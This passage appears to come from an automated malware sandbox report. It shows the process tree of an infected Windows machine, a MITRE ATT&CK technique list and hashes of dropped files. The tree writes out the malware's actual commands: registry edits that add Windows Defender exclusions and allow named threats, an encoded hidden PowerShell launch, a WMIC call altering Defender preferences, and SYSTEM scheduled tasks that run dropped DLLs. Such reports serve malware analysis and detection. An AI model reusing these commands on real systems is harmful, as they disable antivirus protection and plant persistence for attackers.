    PID:6292
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fkrzaJYfU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6308
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fkrzaJYfU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:7068
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jxjAhybTjpHMhOlVVLR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:7112
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jxjAhybTjpHMhOlVVLR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5588
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ksrpDeExrbNyC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3388
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ksrpDeExrbNyC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:544
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VPXvovUKlRyvohVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1196
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VPXvovUKlRyvohVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5952
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5500
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5528
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5548
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5520
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\wzYEFOcpeyKMtFwuD /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5900
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\wzYEFOcpeyKMtFwuD /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5756
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\GTQqDGwYWbPvVFKR /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6196
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\GTQqDGwYWbPvVFKR /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:7016
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gmEoGvKkj" /SC once /ST 18:13:47 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:6228
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gmEoGvKkj"
  2⤵
  PID:2140
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gmEoGvKkj"
  2⤵
  PID:4740
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "sVfKXSxRUTGMojFRQ" /SC once /ST 05:30:14 /RU "SYSTEM" /TR "\"C:\Windows\Temp\GTQqDGwYWbPvVFKR\ZvutFELjBhnCNxa\PzVVrTp.exe\" SY /miJUdidBW 525403 /S" /V1 /F
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:6384
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "sVfKXSxRUTGMojFRQ"
  2⤵
  PID:1380
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 948
  2⤵
  - Program crash
  PID:5540

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
1⤵
PID:5172

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Command and Scripting Interpreter: PowerShell
PID:6100
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:3980

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:5728

C:\Windows\Temp\GTQqDGwYWbPvVFKR\ZvutFELjBhnCNxa\PzVVrTp.exe
C:\Windows\Temp\GTQqDGwYWbPvVFKR\ZvutFELjBhnCNxa\PzVVrTp.exe SY /miJUdidBW 525403 /S
1⤵
PID:6480
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:2652
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    - Indirect Command Execution
    PID:7052
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:6568
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:3208
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    - Indirect Command Execution
    PID:4452
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:5972
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:7072
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    - Indirect Command Execution
    PID:5192
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:6180
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:7096
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    - Indirect Command Execution
    PID:5712
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:6748
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:4292
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    - Indirect Command Execution
    PID:6988
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:6560
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6260
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:3652
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bVxDcMagaMCWGEtnSM"
  2⤵
  PID:6516
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:7144
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
  2⤵
  PID:2136
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
    3⤵
    - Indirect Command Execution
    PID:7084
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
      4⤵
      PID:3496
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6212
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        6⤵
        Blocklisted process makes network request
        
        PID:1760
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\fkrzaJYfU\RzPnNU.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "rkdMMdcQOSgrkCH" /V1 /F
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:5312
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "rkdMMdcQOSgrkCH2" /F /xml "C:\Program Files (x86)\fkrzaJYfU\YbDRLtI.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:6368
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "rkdMMdcQOSgrkCH"
  2⤵
  PID:5428
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "rkdMMdcQOSgrkCH"
  2⤵
  PID:3560
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "qEuMReANSKeOhW" /F /xml "C:\Program Files (x86)\eSZVwhDuipfU2\PEOzIBx.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:4524
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "rDcBhYxsizQNm2" /F /xml "C:\ProgramData\VPXvovUKlRyvohVB\vKkGHCa.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:384
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "vySwpAphEGJzcJQeJ2" /F /xml "C:\Program Files (x86)\jxjAhybTjpHMhOlVVLR\NYZvXdj.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:5200
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "isPWwNKyFiUyNQihUoJ2" /F /xml "C:\Program Files (x86)\ksrpDeExrbNyC\oLOqLIs.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:5488
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "orYTGZZdvmLRzxgHX" /SC once /ST 10:09:03 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\GTQqDGwYWbPvVFKR\Fjhgiwma\hUOWihu.dll\",#1 /YpQKdidF 525403" /V1 /F
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:2912
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "orYTGZZdvmLRzxgHX"
  2⤵
  PID:5232
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "uJVHf1" /SC once /ST 01:18:06 /F /RU "Admin" /TR "\"C:\Program Files\Mozilla Firefox\firefox.exe\""
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:7156
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "uJVHf1"
  2⤵
  PID:7036
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "uJVHf1"
  2⤵
  PID:5988
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5440
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "sVfKXSxRUTGMojFRQ"
  2⤵
  PID:4872
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 6480 -s 1928
  2⤵
  - Program crash
  PID:5632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5168 -ip 5168
1⤵
PID:6992

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:3516

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:5012

C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\GTQqDGwYWbPvVFKR\Fjhgiwma\hUOWihu.dll",#1 /YpQKdidF 525403
1⤵
PID:5168
- C:\Windows\SysWOW64\rundll32.exe
  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\GTQqDGwYWbPvVFKR\Fjhgiwma\hUOWihu.dll",#1 /YpQKdidF 525403
  2⤵
  PID:5972
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "orYTGZZdvmLRzxgHX"
    3⤵
    PID:5344

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:6400
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  PID:2484
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1972 -parentBuildID 20240401114208 -prefsHandle 1900 -prefMapHandle 1892 -prefsLen 23944 -prefMapSize 244858 -appDir "C:\Program Files\Mozilla Firefox\browser" - {293479e1-29c9-4b3a-b528-0aaccff7e803} 2484 "\\.\pipe\gecko-crash-server-pipe.2484" gpu
    3⤵
    PID:2360
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2380 -parentBuildID 20240401114208 -prefsHandle 2372 -prefMapHandle 2368 -prefsLen 23980 -prefMapSize 244858 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a74b326c-0dd3-4634-8251-6e5663548754} 2484 "\\.\pipe\gecko-crash-server-pipe.2484" socket
    3⤵
    PID:5660
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2804 -childID 1 -isForBrowser -prefsHandle 3096 -prefMapHandle 2784 -prefsLen 24121 -prefMapSize 244858 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {14cea8cf-5ec4-484d-afbf-bd1bdff6701c} 2484 "\\.\pipe\gecko-crash-server-pipe.2484" tab
    3⤵
    PID:7120
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4172 -childID 2 -isForBrowser -prefsHandle 4160 -prefMapHandle 4156 -prefsLen 29306 -prefMapSize 244858 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2aa09b40-d8a8-41ea-9c7a-b1671641f31f} 2484 "\\.\pipe\gecko-crash-server-pipe.2484" tab
    3⤵
    PID:6448
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4952 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4968 -prefMapHandle 4964 -prefsLen 29528 -prefMapSize 244858 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {eaaf1869-7f2c-45bc-82ab-f1c6cd5359a1} 2484 "\\.\pipe\gecko-crash-server-pipe.2484" utility
    3⤵
    PID:4056
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5472 -childID 3 -isForBrowser -prefsHandle 5280 -prefMapHandle 5540 -prefsLen 27212 -prefMapSize 244858 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {17059ef2-34be-46f6-ab83-bf1b2d4e0789} 2484 "\\.\pipe\gecko-crash-server-pipe.2484" tab
    3⤵
    PID:5376
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5376 -childID 4 -isForBrowser -prefsHandle 5400 -prefMapHandle 5440 -prefsLen 27212 -prefMapSize 244858 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {545e396d-5764-43b8-9eed-5a43cc4330e0} 2484 "\\.\pipe\gecko-crash-server-pipe.2484" tab
    3⤵
    PID:5184
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5704 -childID 5 -isForBrowser -prefsHandle 5364 -prefMapHandle 5368 -prefsLen 27212 -prefMapSize 244858 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0ad2a380-b160-4cf4-9b26-7ce106c6e839} 2484 "\\.\pipe\gecko-crash-server-pipe.2484" tab
    3⤵
    PID:5164

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4384 -ip 4384
1⤵
PID:4240

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 6480 -ip 6480
1⤵
PID:5968

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
1⤵
PID:6080

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
1⤵
PID:4616

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
1⤵
PID:6736

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
1⤵
PID:5428

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
1⤵
PID:1748

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Indirect Command Execution

T1202

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

Filesize
2.0MB

MD5
7ff607a2c86fd8a067f2382e59a783af

SHA1
17cfe952be119a0d09faa538756cb3cfd6b45662

SHA256
66745377206f86f3a35a4246c4977d2a2a18a7994d1d4aeaf48e7716a69970ae

SHA512
fc57893c733a4889f790bee57a385939a6ec159c7edc54d8ba22d863f3fb177d2b2eb2da8d8e83bed07a8385b21c71d9bc1e610e9dc23bb9915b1b835492b27b

Download Submit
C:\ProgramData\AFHJJEHIEBKK\AFHJJE

Filesize
124KB

MD5
9618e15b04a4ddb39ed6c496575f6f95

SHA1
1c28f8750e5555776b3c80b187c5d15a443a7412

SHA256
a4cd72e529e60b5f74c50e4e5b159efaf80625f23534dd15a28203760b8b28ab

SHA512
f802582aa7510f6b950e3343b0560ffa9037c6d22373a6a33513637ab0f8e60ed23294a13ad8890935b02c64830b5232ba9f60d0c0fe90df02b5da30ecd7fa26

Download Submit
C:\ProgramData\AFHJJEHIEBKK\GCGCBA

Filesize
20KB

MD5
a603e09d617fea7517059b4924b1df93

SHA1
31d66e1496e0229c6a312f8be05da3f813b3fa9e

SHA256
ccd15f9c7a997ae2b5320ea856c7efc54b5055254d41a443d21a60c39c565cb7

SHA512
eadb844a84f8a660c578a2f8e65ebcb9e0b9ab67422be957f35492ff870825a4b363f96fd1c546eaacfd518f6812fcf57268ef03c149e5b1a7af145c7100e2cc

Download Submit
C:\ProgramData\CGIEBAFHJJDB\DGDAEH

Filesize
10KB

MD5
ca61b025c676a933ac87eeb5265355fa

SHA1
0c0b2b26b7277b3101e5cf9a48fbd142858da51e

SHA256
d41597bf91db99fc63335f7fb5bbad04a336459b9aa1fed611f7f1391861a532

SHA512
ebd540acb504501ea6608661f57d0009b36f9363b859680dc9f19a8f9848a4d8583448576668b5d80a7579018720e8e120da3be337467a8c4da0f5effaafbbf3

Download Submit
C:\ProgramData\CGIEBAFHJJDB\EBGCGH

Filesize
114KB

MD5
0916be64eb5262b8fb2f0eae86843dc6

SHA1
92dfeec1180489639c4df32313d252e629fb6d1d

SHA256
d0c8b5b03a18107fabb594a466bf586913f92bade5ddaf679688fd12c0232480

SHA512
0295211f5b49f70e58748b5b2ea11973ddb267828cbd16d0d20497fe2dc218f97fc3cbc37311900a0f11179cbed10c428832baeb8bef7bd2c9bb08603ef0132e

Download Submit
C:\ProgramData\DHJECFCGHI.exe

Filesize
4.7MB

MD5
502ee0741d889207e462d29a9e1b0d23

SHA1
84f97522803326316f13fda1323422a95177a860

SHA256
4022245ab5c4db63803c3aecca8df306498a1c947c0c467c2b4ce5e80fb8db8c

SHA512
20db01beacf8d8542c9afdd02e30ba7597cc85a3c43218457f9435a627d9eec40fc6ed3a9de6fa0e94456316775d7e29b4bdd26135c6ed3b0804dfa364c2de79

Download Submit
C:\ProgramData\JKKKJJJKJK.exe

Filesize
4.7MB

MD5
cd2670554d158aadff36a84cd133a841

SHA1
b2087461f6c10af0503150850e84a8dc309afc48

SHA256
54b7c4e56ab1efc940f22df09a6afc597dc3216b3aa2d597e32e9e26c9af6131

SHA512
034f4d339f2c6509bf74147ec072552d4e3169cc3ed9dccbb666b0468c7d9e9e95a053b999c6f802a71f3ae529d6f177d6e76e88384a082a346c3e022a08266a

Download Submit
C:\ProgramData\KJEHDHIEGIII\BAKEBA

Filesize
160KB

MD5
f310cf1ff562ae14449e0167a3e1fe46

SHA1
85c58afa9049467031c6c2b17f5c12ca73bb2788

SHA256
e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855

SHA512
1196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad

Download Submit
C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\Users\Admin\1000029002\d7807ff8ea.exe

Filesize
273KB

MD5
f10d9e7ad6c6bc87f96a796a36d5c36f

SHA1
7fbe22e16787464766f3119a3e21a77b6f73c2a3

